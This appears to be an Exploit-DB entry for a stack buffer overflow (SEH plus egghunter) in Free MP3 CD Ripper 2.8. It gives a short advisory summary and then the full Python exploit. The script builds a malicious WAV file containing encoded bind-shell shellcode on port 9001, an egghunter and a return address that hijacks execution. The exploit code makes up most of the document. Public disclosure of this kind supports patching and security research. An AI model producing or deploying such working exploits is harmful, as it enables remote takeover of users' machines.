Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter)

vendor:

Free MP3 CD Ripper

by:

Eduard Palisek

7.8

CVSS

HIGH

Stack Buffer Overflow

119

CWE

Product Name: Free MP3 CD Ripper

Affected Version From: 2.8 Build 20140611

Affected Version To: 2.8 Build 20140611

Patch Exists: YES

Related CWE: N/A

CPE: a:cleanersoft:free_mp3_cd_ripper

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows XP, Professional, Version 2002, SP 3

2020

Free MP3 CD Ripper 2.8 – Stack Buffer Overflow (SEH + Egghunter)

Free MP3 CD Ripper 2.8 is vulnerable to a stack buffer overflow vulnerability when a long string is passed to the application. This can be exploited to execute arbitrary code by corrupting the SEH chain and using an egghunter to locate the shellcode.

Mitigation:

Update to the latest version of Free MP3 CD Ripper 2.8

Source

Exploit-DB raw data:

# Exploit Title: Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter)
# Date: 2020-07-22
# Exploit Author: Eduard Palisek
# Vendor Homepage: https://www.cleanersoft.com
# Software Link: https://www.cleanersoft.com/download/FMCRSetup.exe
# Version: 2.8 Build 20140611
# Tested on: [Windows XP, Professional, Version 2002, SP 3
#!/usr/bin/python
file = open("exploit.wav", "wb")

# msfvenom -p windows/shell_bind_tcp LPORT=9001 -a x86 EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d\" -f python -v shellcode_bind

shellcode_bind =  b""
shellcode_bind += b"\xb8\x88\xbf\xa2\x65\xdb\xd6\xd9\x74\x24"
shellcode_bind += b"\xf4\x5a\x2b\xc9\xb1\x53\x83\xc2\x04\x31"
shellcode_bind += b"\x42\x0e\x03\xca\xb1\x40\x90\x36\x25\x06"
shellcode_bind += b"\x5b\xc6\xb6\x67\xd5\x23\x87\xa7\x81\x20"
shellcode_bind += b"\xb8\x17\xc1\x64\x35\xd3\x87\x9c\xce\x91"
shellcode_bind += b"\x0f\x93\x67\x1f\x76\x9a\x78\x0c\x4a\xbd"
shellcode_bind += b"\xfa\x4f\x9f\x1d\xc2\x9f\xd2\x5c\x03\xfd"
shellcode_bind += b"\x1f\x0c\xdc\x89\xb2\xa0\x69\xc7\x0e\x4b"
shellcode_bind += b"\x21\xc9\x16\xa8\xf2\xe8\x37\x7f\x88\xb2"
shellcode_bind += b"\x97\x7e\x5d\xcf\x91\x98\x82\xea\x68\x13"
shellcode_bind += b"\x70\x80\x6a\xf5\x48\x69\xc0\x38\x65\x98"
shellcode_bind += b"\x18\x7d\x42\x43\x6f\x77\xb0\xfe\x68\x4c"
shellcode_bind += b"\xca\x24\xfc\x56\x6c\xae\xa6\xb2\x8c\x63"
shellcode_bind += b"\x30\x31\x82\xc8\x36\x1d\x87\xcf\x9b\x16"
shellcode_bind += b"\xb3\x44\x1a\xf8\x35\x1e\x39\xdc\x1e\xc4"
shellcode_bind += b"\x20\x45\xfb\xab\x5d\x95\xa4\x14\xf8\xde"
shellcode_bind += b"\x49\x40\x71\xbd\x05\xa5\xb8\x3d\xd6\xa1"
shellcode_bind += b"\xcb\x4e\xe4\x6e\x60\xd8\x44\xe6\xae\x1f"
shellcode_bind += b"\xaa\xdd\x17\x8f\x55\xde\x67\x86\x91\x8a"
shellcode_bind += b"\x37\xb0\x30\xb3\xd3\x40\xbc\x66\x49\x48"
shellcode_bind += b"\x1b\xd9\x6c\xb5\xdb\x89\x30\x15\xb4\xc3"
shellcode_bind += b"\xbe\x4a\xa4\xeb\x14\xe3\x4d\x16\x97\x28"
shellcode_bind += b"\xa7\x9f\x71\x44\xa7\xc9\x2a\xf0\x05\x2e"
shellcode_bind += b"\xe3\x67\x75\x04\x5b\x0f\x3e\x4e\x5c\x30"
shellcode_bind += b"\xbf\x44\xca\xa6\x34\x8b\xce\xd7\x4a\x86"
shellcode_bind += b"\x66\x80\xdd\x5c\xe7\xe3\x7c\x60\x22\x93"
shellcode_bind += b"\x1d\xf3\xa9\x63\x6b\xe8\x65\x34\x3c\xde"
shellcode_bind += b"\x7f\xd0\xd0\x79\xd6\xc6\x28\x1f\x11\x42"
shellcode_bind += b"\xf7\xdc\x9c\x4b\x7a\x58\xbb\x5b\x42\x61"
shellcode_bind += b"\x87\x0f\x1a\x34\x51\xf9\xdc\xee\x13\x53"
shellcode_bind += b"\xb7\x5d\xfa\x33\x4e\xae\x3d\x45\x4f\xfb"
shellcode_bind += b"\xcb\xa9\xfe\x52\x8a\xd6\xcf\x32\x1a\xaf"
shellcode_bind += b"\x2d\xa3\xe5\x7a\xf6\xc3\x07\xae\x03\x6c"
shellcode_bind += b"\x9e\x3b\xae\xf1\x21\x96\xed\x0f\xa2\x12"
shellcode_bind += b"\x8e\xeb\xba\x57\x8b\xb0\x7c\x84\xe1\xa9"
shellcode_bind += b"\xe8\xaa\x56\xc9\x38"

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x57\x30\x30\x54\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

nops  = "\x90" * 30
junk1 = "A" * 2112
tag   = "W00TW00T"
junk2 = "B" * (2000-len(shellcode_bind+nops+tag))
eip   = "\x53\x93\x42\x7e"   # 0x7e429353 : jmp esp in user32.dll

buffer  = junk1 + tag + nops + shellcode_bind + junk2 + eip + nops + egghunter

file.write(buffer)
file.close()